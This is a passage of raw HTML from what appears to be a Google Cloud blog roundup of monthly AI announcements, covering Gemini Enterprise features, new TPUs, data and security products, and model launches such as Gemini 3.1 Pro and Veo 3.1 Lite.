&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Inbox in Gemini Enterprise &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;provides a central location to monitor, guide, and help manage all of your agent activity, including your long-running agents. Notifications are intuitively categorized into actionable groups like "Needs your input," "Errors," and "Completed.” &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Projects &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;create a dedicated space where the agent’s memory is confined to the files and conversations your team adds. By connecting it to data sources including Google Drive, NotebookLM, and Google Group Chats, the agent becomes an expert on a specific topic and can provide team members daily briefings or status updates without digging through months of documents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Skills &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;create simple shortcuts using an “@” mention for repetitive tasks such as applying brand guidelines, formatting a report, and accessing specific data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Canvas &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;gives our customers an interactive editor &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;directly within Gemini Enterprise. It allows teams to easily create and edit Docs and Slides, and even export to Microsoft 365 files, within the same experience. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Gallery &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;provides access to &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/partner-built-agents-available-in-gemini-enterprise?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;third-party agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;from partners like Adobe, Atlassian, Lovable, and ServiceNow, and is adding more third-party connectors for Asana, Mailchimp, Workday, and more. These integrations enable your agents to retrieve data and execute tasks with your systems-of-record. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;3. AI Hypercomputer: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Designed specifically for demanding AI workloads, our AI Hypercomputer is an advanced, purpose-built architecture that unites performance-optimized hardware for compute, storage, networking, open software and machine learning frameworks — as well as flexible consumption models — into a single, integrated system. We are &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/compute/ai-infrastructure-at-next26"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;announcing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; innovations at every layer of the AI Hypercomputer:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;TPU 8t, optimized for training, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;uses breakthrough Inter-Chip Interconnect (ICI) technology to scale up to 9,600 TPUs and 2 PB of shared, high-bandwidth memory in a single superpod. It achieves 3x the processing power of Ironwood and delivers up to 2x more performance/Watt. &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;TPU 8i, optimized for inference, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;uses our new Boardfly topology to directly connect 1,152 TPUs in a single pod. It features 3x more on-chip SRAM compared to previous versions to host larger KV caches entirely on-silicon and integrates a specialized Collectives Acceleration Engine. Taken together, TPU 8i delivers 80% better performance per dollar for inference than the prior generation, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/compute/tpu-8t-and-tpu-8i-technical-deep-dive"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;enabling millions of concurrent agents to run cost-effectively&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;4. The Agentic Data Cloud: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;A new data architecture built for the speed and scale of agentic AI. The Agentic Data Cloud delivers an AI-native architecture, allowing agents to perceive, reason, and act on your behalf in real-time, including: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cross-Cloud Lakehouse, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;standardized on Apache Iceberg, is our Lakehouse that enables you to leave your data in AWS or Azure (coming later this year) while querying it instantly — without the friction of vendor lock-in or the cost of data movement&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Knowledge Catalog &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;constructs a unified, dynamic context graph of your entire business enabling you to ground agents in all of your business data and semantics. With Smart Storage and the Object Context API, files in Google Cloud Storage are instantly tagged and enriched with metadata before an agent touches them. Then our Knowledge Engine uses Gemini to autonomously tag, define logic and instantly map complex relationships across your entire enterprise, providing the semantic definition your agents have been missing. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;5. Protecting the agentic enterprise: Security built for the AI era.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our full-stack AI approach, from the chips to the models, gives you a competitive advantage with better integration and velocity to help protect customers. Not only can Google action insights from the world’s largest threat observatory and Mandiant frontline experts, but we also bring cutting-edge insights and breakthroughs from Google DeepMind, to help make your platforms more secure.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Agentic defense&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Three new agents in Google Security Operations can help &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;hunt threats&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;engineer detections&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;provide context on third parties&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. You can build your own security agents with &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;remote Google Cloud model context protocol (MCP) server support&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for Google Security Operations, now generally available. You can also access the MCP server client directly from the Google Security Operations &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;chat interface&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, available in preview.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Protecting AI and cloud apps across any infrastructure with Wiz&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Newly expanded AI coverage helps build secure agents across clouds and AI studios. New AI-Bill of Materials in development tools can help secure AI-generated code and mitigate the &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/these-4-ai-governance-tips-help-counter-shadow-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;risk of shadow AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;a href="https://wiz.io/blog/wiz-at-google-cloud-next" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Securing agents and the agentic web&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Model Armor can integrate with Agent Gateway, and new Agent Identities provide more layers of defense against shadow AI. &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-cloud-fraud-defense-the-next-evolution-of-recaptcha"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Fraud Defense&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the next evolution of reCAPTCHA, offers agent-specific capabilities that can help secure the agentic web as well as the entire user and customer journey.   &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Trusted Cloud&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: We’re simplifying permissions with modern IAM, and advancing Google Cloud security with new capabilities in Security Command Center plus new innovations in data and network security.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;New partner-supported workflows for Google Security Operations&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: This new robust cohort of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/next26-announcing-new-partner-supported-workflows-for-google-security-operations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;partner integrations&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; includes partners developing their own agentic security operations centers (SOCs).&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can catch up on all our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/next26-redefining-security-for-the-ai-era-with-google-cloud-and-wiz"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;security announcements from Next ‘26 here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;News you can use &lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-1-flash-tts-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Guide to prompting Gemini 3.1 Flash TTS (text-to-speech)&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;The new TTS model introduces a high level of controllability by allowing you to steer the delivery using more than 200 audio tags. We'll share how to get strong results from the model, whether you are building accessible gaming soundtracks, banking systems, or audiobooks. Learn more about the model &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-flash-tts/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/ultimate-prompting-guide-for-lyria-3-pro?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Ultimate prompting guide for Lyria 3 models&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://deepmind.google/models/lyria/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lyria 3&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Google's family of music-generation models, is designed to give you granular control over vocals, instrumentation, and arrangement. So we spent weeks testing against every musical genre and use case we could imagine. We put together this guide to share exactly what we learned and how you can get the best results.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/build-a-robust-and-cost-effective-gen-ai-strategy?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;How to find the sweet spot between cost and performance&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: This guide will walk you through Google Cloud's flexible gen AI infrastructure options, showing you how to find that sweet spot on the efficient frontier between cost and performance. We'll start with the foundational pay-as-you-go (PayGo) models and then explore how to layer on more specialized options to build a robust and cost-effective gen AI strategy.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/essential-ai-and-cloud-security-now-on-by-default"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Essential AI and cloud security now on by default&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: To support the next generation of AI innovators, we are offering on by default essential AI security and cloud security in Security Command Center Standard. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/securing-ai-inference-on-gke-with-model-armor"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Securing AI inference on GKE with Model Armor&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Here’s how to secure AI inference on Google Kubernetes Engine with Model Armor and high-performance storage.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-rsac-26-ai-security-and-workforce-of-the-future"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Cloud CISO Perspectives: AI, security, and the workforce of the future&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: You can’t bring traditional security to an AI fight, so how do we defend against AI-powered attacks, boost defenders with AI, and secure AI use? Drop in on this RSA Conference fireside chat between Francis deSouza, Google Cloud COO and President, Security Products, and Nick Godfrey, senior director, Office of the CISO.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr/&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;March&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;March was a busy month for our AI teams. We launched Gemini Embedding 2, rolled out a highly cost-effective Veo 3.1 Lite model, and officially welcomed the Wiz team to Google Cloud to help redefine security in the AI era. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alongside these launches, we created comprehensive guides to help you get the most out of these models, from prompting formulas for Nano Banana 2, to practical advice for optimizing your TPU training. Here’s a quick look at the latest news and resources to help your team build what’s next.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top hits: &lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-embedding-2/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Embedding 2: Our first natively multimodal embedding model:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini Embedding 2 is our first natively multimodal embedding model that maps text, images, video, audio and documents into a single embedding space, enabling multimodal retrieval and classification across different types of media — and it’s available now in public preview.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/ai/veo-3-1-lite/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Build with Veo 3.1 Lite, our most cost-effective video generation model&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This model empowers developers to build high-volume video applications, at less than 50% of the cost of Veo 3.1 Fast, but with the same speed. This rounds out the Veo 3.1 model family, giving developers flexibility based on needs. For Cloud customers, it’s now &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/veo-3-1-lite-and-a-new-veo-upscaling-capability-on-vertex-ai?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;available on Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s a fun bonus: Check out our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/ultimate-prompting-guide-for-veo-3-1?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ultimate prompting guide for Veo 3.1&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to get started.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=1BySW9YaSME"
      data-glue-modal-trigger="uni-modal-1BySW9YaSME-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/maxresdefault_AyzQwc0.max-1000x1000.jpg);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Veo 3.1 Lite&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-1BySW9YaSME-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="1BySW9YaSME"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=1BySW9YaSME"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/google-completes-acquisition-of-wiz?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Welcoming Wiz to Google Cloud: Redefining security for the AI era: &lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;Google has completed its acquisition of Wiz, a leading cloud and AI security platform. The Wiz team will join Google Cloud, and we will retain the Wiz brand. With the addition of Wiz, we will provide customers with a comprehensive platform to secure their cloud and hybrid environments, as well as accelerate threat prevention, detection, and response.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-flash-live/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini 3.1 Flash Live: Making audio AI more natural and reliable: &lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve improved 3.1 Flash Live’s overall quality, making it more reliable for developers and enterprises to build voice-first agents that can complete complex tasks at scale. On ComplexFuncBench Audio, a benchmark that captures multi-step function calling with various constraints, it leads with a score of 90.8% compared to our previous model.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;News you can use: &lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/ultimate-prompting-guide-for-nano-banana?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;The ultimate Nano Banana prompting guide:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This is a must-read for anyone working with Nano Banana. We spent weeks testing Nano Banana 2 and Nano Banana Pro against every use case we could imagine to test its limits. We put together this guide to share exactly what we learned and how you can get the best results. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Here’s an example formula: [Reference images] + [Relationship instruction] + [New scenario]&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_hJWjDOO.max-1000x1000.jpg"
        
          alt="2"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/compute/training-large-models-on-ironwood-tpus?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;A developer’s guide to training with Ironwood TPUs&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this guide, we hear from Lillian Yu, CPA, CA , Product Strategy and Operation, and Liat Berry, Product Manager, on five strategies within the JAX and MaxText ecosystems designed to help developers refine training efficiency and hit peak performance on Ironwood hardware.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/how-to-build-ai-agents-with-google-managed-mcp-servers?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;How to build production-ready AI agents with Google-managed MCP servers&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this guide, we anchor on a specific example. Cityscape is a demo agent built with Google's Application Development Kit (ADK) that turns a simple text prompt — like "Generate a cityscape for Kyoto" — into a unique, AI-generated city image. Check out the guide to learn more. &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built. &lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr/&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;February&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In February, we’re giving developers more reasoning power with Gemini 3.1 Pro and Claude 4.6, and faster creative scaling with Nano Banana 2. We’re also opening up new training programs and step-by-step guides to help you tackle the hardest parts of the AI lifecycle, from capacity planning to mounting defenses against AI-powered attacks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s a rundown of our latest news, tools, and resources to help you build what’s next.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top hits&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/bringing-nano-banana-2-to-enterprise"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Pro-level image generation gets faster and more accessible with Nano Banana 2&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; To build creative that stands out, you need models that naturally integrate into your workflows and scale with ease. Check out &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/bringing-nano-banana-2-to-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;our blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to see how this comes to life (and how customers are putting the model to work).&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/2_3KCMDRE.jpg"
        
          alt="2"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-1-pro-on-gemini-cli-gemini-enterprise-and-vertex-ai"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Introducing Gemini 3.1 Pro on Google Cloud:&lt;/strong&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;Gemini 3.1 Pro is a clear step forward in reasoning, designed to solve tougher problems, giving you the reasoning depth your business needs. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini 3.1 Pro is available starting today in preview in &lt;/span&gt;&lt;a href="https://cloud.google.com/vertex-ai"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Developers can access the model in preview via the Gemini API in &lt;/span&gt;&lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-pro-preview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://developer.android.com/studio" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Android Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://antigravity.google/blog/gemini-3-1-in-google-antigravity" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Antigravity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://geminicli.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini CLI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/li&gt;
